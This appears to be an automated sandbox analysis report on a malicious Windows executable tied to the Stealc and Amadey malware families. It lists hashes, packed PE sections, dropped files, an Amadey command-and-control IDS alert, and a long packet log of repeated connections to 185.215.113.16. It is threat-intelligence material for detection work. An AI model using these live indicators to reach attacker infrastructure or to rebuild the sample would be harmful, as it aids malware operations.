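                    WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
                    WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Amadey | Browse | 185.215.113.16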
                    No context
                    No context
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):1942016
                    Entropy (8bit):7.948905481440068
                    Encrypted:false
                    SSDEEP:49152:NH09SO0SzQIL/QU3TR7u9ZlxJd3dbjJ1Qs/vVhkE+:NH09SOtVL/pTUZdd3mmSE+
                    MD5:544CA28AA15B5ED1C6EE914B09E6F3C2
                    SHA1:4B1A98399C63E9B3220CFB4B7F23F4297FAE6365
                    SHA-256:1AF2F5A32AD1DB3AD373935626A38CC897EC5B717A43EC7DC2D3E507F034AA7D
                    SHA-512:6B6F1E113BB1DE11CAA4F7D287FA7C31A1B79C127EEF99F315FF27EA06C4AE7FEA93D80A7E5A0A06FEA27347359F6D766956AECC4573B22C4A9CE812BCE1E4FC
                    Malicious:true
                    Antivirus:
                    • Antivirus: Avira, Detection: 100%
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    • Antivirus: ReversingLabs, Detection: 58%
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....@.f..............................M...........@..........................0M.....<^....@.................................W...k.............................L.............................4.L..................................................... . ............................@....rsrc...............................@....idata ............................@... ..+.........................@...fhovjjjc.....`2.....................@...tlwinqqe......L......z..............@....taggant.0....M.."..................@...........................................................................................................................................................................................................................
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:ASCII text, with CRLF line terminators
                    Category:modified
                    Size (bytes):26
                    Entropy (8bit):3.95006375643621
                    Encrypted:false
                    SSDEEP:3:ggPYV:rPYV
                    MD5:187F488E27DB4AF347237FE461A079AD
                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                    Malicious:true
                    Reputation:high, very likely benign file
                    Preview:[ZoneTransfer]....ZoneId=0
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):308
                    Entropy (8bit):3.5071267581007395
                    Encrypted:false
                    SSDEEP:6:93SzsQZX2JUEZ+lX1lOJUPelkDdtcVAkXIEZ8MlW8+y0lbout0:9Czzl2JQ1lOmeeDhkXd8kX+VMut0
                    MD5:AAB9786FCEAB4E94EB39189F613B3F44
                    SHA1:F9BAD97F936AC86BBC6A7A7D53A56EB2F8E1FF3F
                    SHA-256:52FCC92ACF3A740B725A10862C6201B2041A74BC7D9754CC48C56BB63939F22D
                    SHA-512:E571B145979BA7B3580DFBB44492891A2D0B6E62C9B21C5865F9EA2DE83292D2D07AF1AF3DFCDD0E45F595003028983FBECB900847E0EE294DE91728F2848E95
                    Malicious:false
                    Reputation:low
                    Preview:.......Nr..N..aVB...F.......<... .....s.......... ....................<.C.:.\.U.s.e.r.s.\.F.R.O.N.T.D.~.1.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.4.4.1.1.1.d.b.c.4.9.\.a.x.p.l.o.n.g...e.x.e.........F.R.O.N.T.D.E.S.K.-.P.C.\.f.r.o.n.t.d.e.s.k...................0...................@3P.........................
                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Entropy (8bit):7.948905481440068
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 99.96%
                    • Generic Win/DOS Executable (2004/3) 0.02%
                    • DOS Executable Generic (2002/1) 0.02%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:file.exe
                    File size:1'942'016 bytes
                    MD5:544ca28aa15b5ed1c6ee914b09e6f3c2
                    SHA1:4b1a98399c63e9b3220cfb4b7f23f4297fae6365
                    SHA256:1af2f5a32ad1db3ad373935626a38cc897ec5b717a43ec7dc2d3e507f034aa7d
                    SHA512:6b6f1e113bb1de11caa4f7d287fa7c31a1b79c127eef99f315ff27ea06c4ae7fea93d80a7e5a0a06fea27347359f6d766956aecc4573b22c4a9ce812bce1e4fc
                    SSDEEP:49152:NH09SO0SzQIL/QU3TR7u9ZlxJd3dbjJ1Qs/vVhkE+:NH09SOtVL/pTUZdd3mmSE+
                    TLSH:0A9533AE52C4473BE3436F3F8965F9B9EFEFC42485181032EB4E66EAD50A51CC4A6710
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>................
                    Icon Hash:00928e8e8686b000
                    Entrypoint:0x8d0000
                    Entrypoint Section:.taggant
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                    Time Stamp:0x66A240BE [Thu Jul 25 12:10:38 2024 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:6
                    OS Version Minor:0
                    File Version Major:6
                    File Version Minor:0
                    Subsystem Version Major:6
                    Subsystem Version Minor:0
                    Import Hash:2eabe9054cad5152567f0699947a2c5b
                    Instruction
                    jmp 00007F865CEE924Ah
                    jo 00007F865CEE9263h
                    add byte ptr [eax], al
                    jmp 00007F865CEEB245h
                    Name | Virtual Address | Virtual Size | Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_IMPORT | 0x6a057 | 0x6b | .idata
                    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x69000 | 0x1e0 | .rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x4ce284 | 0x10 | fhovjjjc
                    IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_TLS | 0x4ce234 | 0x18 | fhovjjjc
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                    Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                     | 0x1000 | 0x68000 | 0x2de00 | 3fbe2d53bac981b92092e24e571f68f8 | False | 0.9971315139645777 | data | 7.976264378298446 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .rsrc | 0x69000 | 0x1e0 | 0x200 | 31291c5676126d6072b2740eec5f0b1e | False | 0.580078125 | data | 4.458154068548417 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .idata | 0x6a000 | 0x1000 | 0x200 | cc76e3822efdc911f469a3e3cc9ce9fe | False | 0.1484375 | data | 1.0428145631430756 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                     | 0x6b000 | 0x2bb000 | 0x200 | 2cd7f97eee1fcd8f4a4b728974e6c3d8 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    fhovjjjc | 0x326000 | 0x1a9000 | 0x1a8600 | 14ff4af6453ef4d169e4507242ff5d14 | False | 0.994316089837997 | data | 7.95414237718118 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    tlwinqqe | 0x4cf000 | 0x1000 | 0x600 | 2598b8a3761c86a68cf15f1a7d4b4597 | False | 0.576171875 | data | 4.983374135333367 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .taggant | 0x4d0000 | 0x3000 | 0x2200 | 8f413e51de559a41ec83c176fd738210 | False | 0.006433823529411764 | DOS executable (COM) | 0.019571456231530684 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                    RT_MANIFEST | 0x4ce294 | 0x17d | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5931758530183727

                    DLL | Import
                    kernel32.dll | lstrcpy

                    Language of compilation system | Country where language is spoken | Map
                    English | United States |
                    Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                    2024-09-27T01:29:16.039993+0200 | 2856147 | ETPRO MALWARE Amadey CnC Activity M3 | 1 | 192.168.2.7 | 49718 | 185.215.113.16 | 80 | TCP
                    Sep 27, 2024 01:29:12.712055922 CEST8049715185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:12.712162971 CEST4971580192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:12.712379932 CEST8049716185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:12.712452888 CEST4971680192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:12.712579012 CEST4971680192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:12.717639923 CEST8049716185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:13.454965115 CEST8049716185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:13.455056906 CEST4971680192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:13.455728054 CEST4971680192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:13.460627079 CEST8049716185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:13.682399035 CEST8049716185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:13.682471991 CEST4971680192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:13.784749031 CEST4971680192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:13.785129070 CEST4971780192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:13.789802074 CEST8049716185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:13.789884090 CEST4971680192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:13.789917946 CEST8049717185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:13.789994955 CEST4971780192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:13.790092945 CEST4971780192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:13.794856071 CEST8049717185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:14.482147932 CEST8049717185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:14.482331991 CEST4971780192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:14.483040094 CEST4971780192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:14.487802029 CEST8049717185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:14.704719067 CEST8049717185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:14.704910040 CEST4971780192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:14.816577911 CEST4971780192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:14.816932917 CEST4971880192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:14.821599007 CEST8049717185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:14.821677923 CEST4971780192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:14.821697950 CEST8049718185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:14.821763039 CEST4971880192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:14.821867943 CEST4971880192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:14.826592922 CEST8049718185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:16.039895058 CEST8049718185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:16.039928913 CEST8049718185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:16.039993048 CEST4971880192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:16.039993048 CEST4971880192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:16.040036917 CEST8049718185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:16.040087938 CEST4971880192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:16.040792942 CEST4971880192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:16.045568943 CEST8049718185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:16.265012026 CEST8049718185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:16.265116930 CEST4971880192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:16.379667997 CEST4971880192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:16.380517006 CEST4971980192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:16.384860992 CEST8049718185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:16.384932041 CEST4971880192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:16.385320902 CEST8049719185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:16.385390997 CEST4971980192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:16.385524988 CEST4971980192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:16.390212059 CEST8049719185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:17.152738094 CEST8049719185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:17.152851105 CEST4971980192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:17.153491020 CEST4971980192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:17.158325911 CEST8049719185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:17.383819103 CEST8049719185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:17.383924007 CEST4971980192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:17.487725973 CEST4971980192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:17.488121033 CEST4972080192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:17.493061066 CEST8049720185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:17.493138075 CEST4972080192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:17.493264914 CEST4972080192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:17.494147062 CEST8049719185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:17.494210958 CEST4971980192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:17.498168945 CEST8049720185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:18.197046041 CEST8049720185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:18.197242975 CEST4972080192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:18.229846954 CEST4972080192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:18.234807014 CEST8049720185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:18.451353073 CEST8049720185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:18.451493025 CEST4972080192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:18.567190886 CEST4972080192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:18.568475962 CEST4972180192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:18.572388887 CEST8049720185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:18.572451115 CEST4972080192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:18.573230028 CEST8049721185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:18.573299885 CEST4972180192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:18.575167894 CEST4972180192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:18.579885006 CEST8049721185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:19.322673082 CEST8049721185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:19.322787046 CEST4972180192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:19.323407888 CEST4972180192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:19.328167915 CEST8049721185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:19.553539991 CEST8049721185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:19.553611040 CEST4972180192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:19.661569118 CEST4972180192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:19.662055969 CEST4972280192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:19.666847944 CEST8049722185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:19.666949034 CEST4972280192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:19.667047977 CEST4972280192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:19.667123079 CEST8049721185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:19.667188883 CEST4972180192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:19.671763897 CEST8049722185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:20.463644981 CEST8049722185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:20.463726044 CEST4972280192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:20.464405060 CEST4972280192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:20.469214916 CEST8049722185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:20.696082115 CEST8049722185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:20.696265936 CEST4972280192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:20.834968090 CEST4972280192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:20.835287094 CEST4972380192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:20.840300083 CEST8049722185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:20.840315104 CEST8049723185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:20.840389967 CEST4972280192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:20.840461016 CEST4972380192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:20.840539932 CEST4972380192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:20.845701933 CEST8049723185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:21.609952927 CEST8049723185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:21.610126019 CEST4972380192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:21.611404896 CEST4972380192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:21.618809938 CEST8049723185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:21.844621897 CEST8049723185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:21.844716072 CEST4972380192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:21.956666946 CEST4972380192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:21.956996918 CEST4972480192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:21.961823940 CEST8049723185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:21.961846113 CEST8049724185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:21.961905956 CEST4972380192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:21.961978912 CEST4972480192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:21.962060928 CEST4972480192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:21.967547894 CEST8049724185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:22.690646887 CEST8049724185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:22.690736055 CEST4972480192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:22.691354036 CEST4972480192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:22.696103096 CEST8049724185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:22.920526028 CEST8049724185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:22.920654058 CEST4972480192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:23.035528898 CEST4972480192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:23.035995960 CEST4972580192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:23.041225910 CEST8049725185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:23.041290045 CEST4972580192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:23.041430950 CEST4972580192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:23.041735888 CEST8049724185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:23.041778088 CEST4972480192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:23.046178102 CEST8049725185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:23.728781939 CEST8049725185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:23.728938103 CEST4972580192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:23.730155945 CEST4972580192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:23.734926939 CEST8049725185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:23.952552080 CEST8049725185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:23.952718019 CEST4972580192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:24.066312075 CEST4972580192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:24.066620111 CEST4972680192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:24.071590900 CEST8049725185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:24.071647882 CEST4972580192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:24.072426081 CEST8049726185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:24.072618008 CEST4972680192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:24.072804928 CEST4972680192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:24.077931881 CEST8049726185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:24.797843933 CEST8049726185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:24.798013926 CEST4972680192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:24.798696995 CEST4972680192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:24.803414106 CEST8049726185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:25.032542944 CEST8049726185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:25.032728910 CEST4972680192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:25.144020081 CEST4972680192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:25.144351006 CEST4972780192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:25.272200108 CEST8049727185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:25.272217989 CEST8049726185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:25.272280931 CEST4972780192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:25.272322893 CEST4972680192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:25.272520065 CEST4972780192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:25.277272940 CEST8049727185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:25.993844032 CEST8049727185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:25.993961096 CEST4972780192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:26.019258022 CEST4972780192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:26.024285078 CEST8049727185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:26.249974966 CEST8049727185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:26.250071049 CEST4972780192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:26.362833023 CEST4972780192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:26.363148928 CEST4972880192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:26.368041039 CEST8049727185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:26.368062973 CEST8049728185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:26.368124008 CEST4972780192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:26.368158102 CEST4972880192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:26.368300915 CEST4972880192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:26.373037100 CEST8049728185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:27.500171900 CEST8049728185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:27.500315905 CEST4972880192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:27.500407934 CEST8049728185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:27.500463963 CEST4972880192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:27.501046896 CEST4972880192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:27.505897999 CEST8049728185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:27.731050014 CEST8049728185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:27.731189966 CEST4972880192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:27.847446918 CEST4972880192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:27.847754955 CEST4972980192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:27.852588892 CEST8049728185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:27.852623940 CEST8049729185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:27.852644920 CEST4972880192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:27.852699041 CEST4972980192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:27.852840900 CEST4972980192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:27.857609987 CEST8049729185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:28.542624950 CEST8049729185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:28.542697906 CEST4972980192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:28.557410955 CEST4972980192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:28.562231064 CEST8049729185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:28.932651997 CEST8049729185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:28.932732105 CEST4972980192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:29.036638975 CEST4972980192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:29.036971092 CEST4973080192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:29.041768074 CEST8049730185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:29.041786909 CEST8049729185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:29.041872978 CEST4972980192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:29.041889906 CEST4973080192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:29.041997910 CEST4973080192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:29.046885967 CEST8049730185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:29.761863947 CEST8049730185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:29.762010098 CEST4973080192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:29.763020039 CEST4973080192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:29.767848969 CEST8049730185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:30.196727991 CEST8049730185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:30.196887016 CEST4973080192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:30.315988064 CEST4973080192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:30.316317081 CEST4973180192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:30.321104050 CEST8049730185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:30.321135044 CEST8049731185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:30.321183920 CEST4973080192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:30.321252108 CEST4973180192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:30.321341038 CEST4973180192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:30.326086044 CEST8049731185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:31.151405096 CEST8049731185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:31.151485920 CEST4973180192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:31.152122021 CEST4973180192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:31.157097101 CEST8049731185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:31.375447989 CEST8049731185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:31.375550985 CEST4973180192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:31.488085985 CEST4973180192.168.2.7185.215.113.16
